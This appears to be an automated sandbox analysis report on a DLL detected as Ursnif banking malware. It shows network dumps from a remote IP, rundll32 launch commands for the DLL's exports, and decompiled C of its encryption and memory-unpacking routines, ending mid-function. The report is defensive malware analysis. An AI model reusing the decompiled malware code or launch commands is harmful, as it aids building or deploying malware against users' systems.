70 58 33 39 73 42 54 45 2b 64 53 4b 36 58 74 35 69 74 77 62 62 79 58 72 6c 35 47 76 58 39 33 76 6a 42 74 41 72 31 62 32 73 47 67 50 4d 2f 71 5a 76 44 42 2b 38 66 74 38 6b 46 42 73 37 61 75 6f 61 5a 4d 69 75 61 2b 78 71 6b 71 73 38 67 65 66 44 39 2f 6a 48 2f 59 47 56 34 4f 76 4f 35 4f 63 63 62 6c 54 5a 42 36 78 39 31 49 52 74 4b 34 4b 50 49 75 75 Data Ascii: bYm2yirtQj19R9BTIzJvU2oYQ+XJwgwIPJjr5Vr6EGtXJryb8KUSemwEn1pnv9pzmV4Df+AiZU0BIE01gulN0aZM6Ji7dnzQx2JZze37aLyY9OxtuDkFblURDcBuzI8wObydSneS4G99nZyK3JTcyYyVeMHdnVFYfIRKEWNDROEhHu/uAXZx/Mra5WsRjOp4+/7UR0p7B3a9J/vxUtdABLsCxgIYD1ieajqmYC+/M4r2OX0MTSHzn/Lkm9s3+GlS0Ivaht8M1lQD8ydNdWgEm2qpHWdjLesrp4mpGhX2nzVFOaesPFssu3DJGFrPzZU/B5y4A0bugWWwq21FY1Lqp6j6xd0zcsJOaXVshUJJcML/5qYwS+wRYWUio9N7k2YpfMEYvdd9bFaP7hTCc+/85Z2lx9DK04lqw0DEH2j6AEpFQkUGH7yWbukst7mY12W9ogHZW2ekaqzIsuHzMqP+ki4uXtc2fp9cfBuqdhTQAtCOitHtiHVg0z9tu632GnUfkOltl+gBcu2Pat7ogLVVW+qzdaOZbgbVQBbCu+PjDLS+oD9a1X23tBYnAhghvJjeOF82JSjJf+1Q9Z1ZL0WDY0Ks35E4SN1rSOBsDFpOqPzihv3sfcRHQOqycxp5Db+Pqan9imI+SdicopVlfnYRuZ26ZMccZ/C7Dw9zAv6tTqzXYVlqmUvVoa0NUdvydOVDg7cT23fOlPM7cL0mBmMhKw3U0nBRjlf0+wnJZYkP+FCaLHS15OVlgc4OM4Kl+ne+vNFWQyOZPS9vXk+s7ZjfFEs5MERPoutpX39sBTE+dSK6Xt5itwbbyXrl5GvX93vjBtAr1b2sGgPM/qZvDB+8ft8kFBs7auoaZMiua+xqkqs8gefD9/jH/YGV4OvO5OccblTZB6x91IRtK4KPIuu
Jul 28, 2021 13:47:59.292196989 CEST	1843	IN	Data Raw: 50 78 6b 55 47 4a 4c 6e 68 46 36 57 74 78 48 61 50 35 34 52 35 55 70 63 48 68 58 31 62 78 54 2f 59 67 6b 2b 34 4d 47 6e 48 47 72 30 72 6f 6a 2f 64 39 63 50 58 4e 32 6f 53 45 53 4d 41 56 41 58 45 67 38 6f 72 35 77 50 59 57 71 57 74 44 33 46 33 74 Data Ascii: PxkUGJLnhF6WtxHaP54R5UpcHhX1bxT/Ygk+4MGnHGr0roj/d9cPXN2oSESMAVAXEg8or5wPYWqWtD3F3t8A0JaL1TjQzNbkwnBNULPQ2e5VaPiSMyCpr1BxX4y2z4KOFIXmTcE2fTwbP2VUCI10WE+56ZwcMSIEyf9wem05IiIlOWA2Ij369D2coVDRfdSdjp2e0dMd8nhjbgOg5QdL4KLrcMHeMZZ5+FOgv3TF5T9oUX7gOJp
Jul 28, 2021 13:47:59.293209076 CEST	1845	IN	Data Raw: 4b 64 63 36 32 6b 44 63 33 47 52 41 4f 33 37 6c 34 34 6c 42 30 74 48 48 2b 61 49 30 51 39 4d 72 2b 4c 61 76 38 68 54 77 49 6b 6b 43 6e 64 55 79 68 30 37 73 76 63 5a 42 51 79 2b 36 77 6a 49 36 61 74 68 62 38 33 4c 75 67 2b 37 64 4a 4b 59 68 56 41 Data Ascii: Kdc62kDc3GRAO37l44lB0tHH+aI0Q9Mr+Lav8hTwIkkCndUyh07svcZBQy+6wjI6athb83Lug+7dJKYhVASPQFUps7XectgPWCPJmAlSPORiH1LTY8020QkkGHePhXfo+8Vo++5xXIQx7/MhUJTUcscTmN5ah+wZWhGOWIulf3QHLG/sUQhibUZBgTf1A0RpVh6VU+dXhXYU1f6Bx3e5sH9RA0rhuaOqEyj4fUpgSqW+xLV6a+M
Jul 28, 2021 13:47:59.293246984 CEST	1846	IN	Data Raw: 71 71 2f 63 50 69 2b 6f 46 72 74 59 48 48 44 62 55 69 46 62 33 61 62 6c 7a 73 42 7a 34 36 70 62 64 74 75 6d 49 46 73 35 69 48 32 4f 6a 73 63 74 79 78 63 77 4d 58 64 5a 30 33 71 46 48 4a 62 73 75 36 66 4a 67 46 4c 74 2f 76 78 47 62 58 36 47 62 35 Data Ascii: qq/cPi+oFrtYHHDbUiFb3ablzsBz46pbdtumIFs5iH2OjsctyxcwMXdZ03qFHJbsu6fJgFLt/vxGbX6Gb5e8NRYMlOBIqAcu6Jb96/89ytvwjvpPgeAOcYwHFfnTEvCX+m26PzQ2jLFLnuGAyEXe2TrLxgpPUz8i+7PLWxsBI/NVxhz0DB0t7CNjp+3VtC0yRXAEHZ0MniOc9VwY1agIT6vb1W8+obdC6du61bFWvvI5m9Tf50B
Jul 28, 2021 13:47:59.295627117 CEST	1848	IN	Data Raw: 52 63 66 74 74 51 67 64 53 4c 58 6e 7a 70 74 57 35 6d 35 34 43 67 2f 45 69 4d 30 73 53 52 56 4c 72 32 46 55 58 2b 68 6a 69 54 5a 58 30 6f 71 63 49 6d 30 45 48 4b 43 71 56 75 51 2b 55 2b 50 54 50 68 4c 41 59 6f 45 5a 77 57 79 7a 6b 57 42 41 51 75 Data Ascii: RcfttQgdSLXnzptW5m54Cg/EiM0sSRVLr2FUX+hjiTZX0oqcIm0EHKCqVuQ+U+PTPhLAYoEZwWyzkWBAQuGXevwJthpmtWFMlecRiUuZS8cAvHGRYHdOzBsyLLsFt6LNaSc9i3LGumnVefKuILugtZ8eceM6ZRr8z47yAI9WYXBMu1PTMjjsEGXn2ET4x+6TOfEvB8dFWpPCO1aqF7bLZa5MXyV+58b4YYT6VRop20CStdDstCw
Jul 28, 2021 13:47:59.295660019 CEST	1849	IN	Data Raw: 36 63 66 37 48 31 7a 67 41 35 2b 79 76 32 75 63 49 71 6a 48 57 7a 6c 77 4d 31 62 34 35 58 77 62 4e 65 61 74 2b 75 49 56 47 78 52 78 62 6b 62 4d 62 70 51 4c 6a 34 49 72 72 59 6f 49 72 36 4e 36 35 35 32 34 32 6a 62 58 79 36 70 31 77 34 50 47 6b 6e Data Ascii: 6cf7H1zgA5+yv2ucIqjHWzlwM1b45XwbNeat+uIVGxRxbkbMbpQLj4IrrYoIr6N655242jbXy6p1w4PGknkMWSiaehadVOvqQkWKh6sltB06oaP6utYkuOZhxLfasmYEgrSu+FOMU/dkb4TWXBC9J0disgzDLeXHxck+h6wZSYDrzbhT+yt2O7XZSYySoNGwzwyX/HQXHxD7o1/yt3WoK9FdHyDzVGUq1Fwjg8HL9qanw/DBMZO
Jul 28, 2021 13:47:59.297955036 CEST	1851	IN	Data Raw: 32 6b 35 51 57 74 76 4e 39 5a 36 77 42 68 57 62 6e 58 74 37 76 69 37 70 70 66 4f 6a 74 6e 73 71 63 39 6c 2f 6e 58 79 43 48 55 51 79 75 30 61 31 66 69 43 46 43 32 49 63 58 2b 33 55 63 51 4d 5a 61 53 32 46 6f 43 62 4c 4e 67 38 56 32 6f 67 63 31 55 Data Ascii: 2k5QWtvN9Z6wBhWbnXt7vi7ppfOjtnsqc9l/nXyCHUQyu0a1fiCFC2IcX+3UcQMZaS2FoCbLNg8V2ogc1UhREMmQ0fRrydsBcYyA2K9oryeXV+6auH9qLpj9i524+EtEitYQa8iHMQzYExb/o55xW3aUwu0gT7CTJRb1wOIA/s6rwzYpCYcPkCccKcwX2PxWJ+6K6DXsO0JiERgzN1tcao3LnMIl6vMidBtoRmzgqpuHM+QhWOo
Jul 28, 2021 13:47:59.297987938 CEST	1852	IN	Data Raw: 72 4a 6e 59 6f 38 46 58 54 7a 61 56 2b 4e 55 48 63 31 50 46 54 67 33 67 49 38 71 42 58 4a 6b 49 47 51 2f 73 77 4c 64 54 45 63 45 78 36 52 78 4a 4f 66 55 62 55 77 5a 45 71 63 70 31 78 72 45 79 5a 44 4b 34 39 38 33 72 4d 35 76 52 53 50 61 36 33 50 Data Ascii: rJnYo8FXTzaV+NUHc1PFTg3gI8qBXJkIGQ/swLdTEcEx6RxJOfUbUwZEqcp1xrEyZDK4983rM5vRSPa63PKEccoGzbQtrzpBXs/BJaHqSoAHGNRytBnUIwmT6Ve8C9BFKCc62RsFCY0BHgNSebm5XyKj6+B3WRixFmkJF46pL4ISvyxUcprFfp4pAVQ9YSZkLrWc4bR3rFHKEbun0wz6lif4m5T+yl5F5oI/Rue4gnVTHftcqWs
Jul 28, 2021 13:47:59.300517082 CEST	1853	IN	Data Raw: 4f 43 46 69 2b 7a 71 38 74 2b 68 47 6a 41 4f 2b 63 51 47 73 4c 61 44 77 52 6e 72 56 6c 6c 62 45 69 78 50 75 79 42 31 42 52 4b 57 50 4e 64 33 53 2f 43 4c 53 6d 62 6e 62 2b 39 49 78 75 65 2b 75 43 66 77 6b 59 36 35 70 66 4d 72 4d 67 34 54 75 37 33 Data Ascii: OCFi+zq8t+hGjAO+cQGsLaDwRnrVllbEixPuyB1BRKWPNd3S/CLSmbnb+9Ixue+uCfwkY65pfMrMg4Tu73xhmh2WgeJdNAmXlWvI/Ix8dwYLp38EuD43PD7D6Q+IVyntv6vwNyj2P5C3tOau9oLr8i4qHMhNiwAX0KlDr/lErwWxDK6owugoWHNyK6Rvu7tmKsOid7kB/VZGRSfPJa85cAUFZV4a8DzwXfR9CTeTfD1BHZQxFFp
Jul 28, 2021 13:47:59.300546885 CEST	1855	IN	Data Raw: 52 43 74 58 5a 45 39 6b 49 42 58 76 51 6d 64 52 4b 78 2b 42 4b 33 53 7a 74 63 5a 59 48 64 46 6d 32 47 4b 66 47 79 63 54 34 6d 2b 71 48 55 35 66 41 48 34 36 78 68 33 58 4e 52 37 49 6a 4a 4f 54 78 67 79 72 58 63 76 45 6b 67 71 49 75 6c 68 5a 2f 73 Data Ascii: RCtXZE9kIBXvQmdRKx+BK3SztcZYHdFm2GKfGycT4m+qHU5fAH46xh3XNR7IjJOTxgyrXcvEkgqIulhZ/sGla9c4a8X15N9Q4OpPaTOmxfSmUL1RgtEqpmAeebPrFgPoHn1E3LzrA6EblHzUgYTPAtK6MjoeUBgZflKst3/W8QJ4lyOF+c0wG1QqPi9YjfhGrE9bg8vWrVkIZdNKy7OnHUjdkQ15Eu5pt6z2Dn8wtHsmWhdJaBz
Jul 28, 2021 13:47:59.372632027 CEST	1856	IN	Data Raw: 49 49 64 6b 66 75 49 79 38 34 45 4e 39 58 35 36 36 4e 59 2b 66 44 47 66 63 2b 53 30 43 4c 33 5a 31 32 30 33 51 75 63 61 48 61 32 63 4c 77 46 30 74 35 48 78 58 4f 44 57 77 57 67 51 62 54 53 31 46 31 7a 70 31 6b 69 58 75 43 31 53 52 42 70 47 46 53 Data Ascii: IIdkfuIy84EN9X566NY+fDGfc+S0CL3Z1203QucaHa2cLwF0t5HxXODWwWgQbTS1F1zp1kiXuC1SRBpGFSDDKuuKhCRtEMPHhMj6utRSh7P3IknjKn0Jctl8YdjVMMd5qetA0Pea9z3OGTdwVm+aAi59spF76jC3hBWCc927K7RiKKXlxBgf+3y3yx3IZZUroVfIMdIrR4Tswx5rk25jDDE9iQ5Bm839XUGluPZAneVwTZwYlCE

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	185.228.233.17	80	192.168.2.4	49740	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 28, 2021 13:48:14.519860983 CEST	8134	IN	HTTP/1.0 408 Request Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6608 Parent PID: 5920

General

Start time:	13:46:06
Start date:	28/07/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\mental.dll'
Imagebase:	0xc70000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6624 Parent PID: 6608

General

Start time:	13:46:06
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6632 Parent PID: 6608

General

Start time:	13:46:06
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\mental.dll,Behind
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6644 Parent PID: 6624

General

Start time:	13:46:07
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6720 Parent PID: 6608

General

Start time:	13:46:11
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\mental.dll,Factpresent
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6736 Parent PID: 6608

General

Start time:	13:46:15
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\mental.dll,Steadunder
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5608 Parent PID: 800

General

Start time:	13:47:41
Start date:	28/07/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff659610000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5532 Parent PID: 5608

General

Start time:	13:47:42
Start date:	28/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17410 /prefetch:2
Imagebase:	0xad0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3064 Parent PID: 5608

General

Start time:	13:47:57
Start date:	28/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17420 /prefetch:2
Imagebase:	0xad0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6608 Parent PID: 5920 loaddll32.exeCOMMON

Executed Functions

Function 00DE39C5, Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00DE39C5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0xdea0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0xdea0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00DE6837(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0xdea0b0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0xdea0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00DE50CA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x00de39ce
0x00de39d4
0x00de39d7
0x00de39dd
0x00de39dd
0x00de39df
0x00de39e1
0x00de39e4
0x00de39ea
0x00de39eb
0x00de39ec
0x00de39f2
0x00de39f7
0x00de39fd
0x00de3a05
0x00de3b62
0x00de3a0b
0x00de3a0d
0x00de3a16
0x00de3a1b
0x00de3a2d
0x00de3a30
0x00de3a34
0x00de3a3b
0x00de3a3f
0x00de3a47
0x00de3b4d
0x00de3a4d
0x00de3a4d
0x00de3a51
0x00de3a52
0x00de3a54
0x00de3a5f
0x00de3b39
0x00de3a65
0x00de3a65
0x00de3a68
0x00de3a6e
0x00de3a74
0x00de3a74
0x00de3a7c
0x00de3a80
0x00de3a83
0x00de3b2a
0x00de3a89
0x00de3a8f
0x00de3a92
0x00de3a95
0x00de3a97
0x00de3a9a
0x00de3a9d
0x00de3a9f
0x00de3a9f
0x00de3aa9
0x00de3aae
0x00de3ab1
0x00de3ab4
0x00de3ab6
0x00de3abf
0x00de3ae9
0x00de3ac1
0x00de3ad2
0x00de3ad2
0x00de3af1
0x00000000
0x00000000
0x00de3af3
0x00de3af6
0x00de3af9
0x00de3afd
0x00000000
0x00de3aff
0x00de3b0e
0x00de3b14
0x00de3b1c
0x00de3b1c
0x00000000
0x00de3afd
0x00de3b01
0x00de3b09
0x00de3b0c
0x00de3b23
0x00000000
0x00000000
0x00000000
0x00de3b0c
0x00de3a83
0x00de3b3c
0x00de3b3f
0x00de3b3f
0x00de3b54
0x00de3b54
0x00de3b6c

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00DE4A23,00000001,00DE70D9,00000000), ref: 00DE39FD
memcpy.NTDLL(00DE4A23,00DE70D9,00000010,?,?,?,00DE4A23,00000001,00DE70D9,00000000,?,00DE62B1,00000000,00DE70D9,?,00000000), ref: 00DE3A16
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00DE3A3F
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00DE3A57
memcpy.NTDLL(00000000,00000000,03D19630,00000010), ref: 00DE3AA9
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,03D19630,00000020,?,?,00000010), ref: 00DE3AD2
GetLastError.KERNEL32(?,?,00000010), ref: 00DE3B01
GetLastError.KERNEL32 ref: 00DE3B33
CryptDestroyKey.ADVAPI32(00000000), ref: 00DE3B3F
GetLastError.KERNEL32 ref: 00DE3B47
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00DE3B54
GetLastError.KERNEL32(?,?,?,00DE4A23,00000001,00DE70D9,00000000,?,00DE62B1,00000000,00DE70D9,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE3B5C

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID:
API String ID: 3401600162-0
Opcode ID: f8857c5a90d4aac68fd695ba877217e69865d8459be4aec8a670455729c32583
Instruction ID: d6be0b859616340f73727be090c279b65f7591f967f2ef133823cff145b8b90f
Opcode Fuzzy Hash: f8857c5a90d4aac68fd695ba877217e69865d8459be4aec8a670455729c32583
Instruction Fuzzy Hash: 9D516A71900289FFDB11EFAADC88AAEBBB9EB04350F148425F951E7250D7709E54DB31

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CA7ED, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000009CC,00003000,00000040,000009CC,6D4CA240), ref: 6D4CA8A7
VirtualAlloc.KERNEL32(00000000,0000009A,00003000,00000040,6D4CA29F), ref: 6D4CA8DE
VirtualAlloc.KERNEL32(00000000,00011388,00003000,00000040), ref: 6D4CA93E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D4CA974
VirtualProtect.KERNEL32(6D470000,00000000,00000004,6D4CA7CC), ref: 6D4CAA79
VirtualProtect.KERNEL32(6D470000,00001000,00000004,6D4CA7CC), ref: 6D4CAAA0
VirtualProtect.KERNEL32(00000000,?,00000002,6D4CA7CC), ref: 6D4CAB6D
VirtualProtect.KERNEL32(00000000,?,00000002,6D4CA7CC,?), ref: 6D4CABC3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D4CABDF

Memory Dump Source

Source File: 00000000.00000002.925102786.000000006D4CA000.00000040.00020000.sdmp, Offset: 6D4CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ca000_loaddll32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 5d46b9c5940f4ee50b30dc4771111a3df77e7e75003685d0b3268aae6c223ad0
Instruction ID: 5d8e052c685540637a97c65ced49af48894cea137a5263557ebd8d999abcec1a
Opcode Fuzzy Hash: 5d46b9c5940f4ee50b30dc4771111a3df77e7e75003685d0b3268aae6c223ad0
Instruction Fuzzy Hash: 2FD139765002019FDB25CF58C885F627BA6FF48310B194298EE099F35AEBBDAC11CB75

Uniqueness

Uniqueness Score: -1.00%

Function 6D471144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E6D471144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D472210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d4741d0;
				_push(_t15 + 0x6d47505e);
				_push(_t15 + 0x6d475054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D47220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6d4741c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
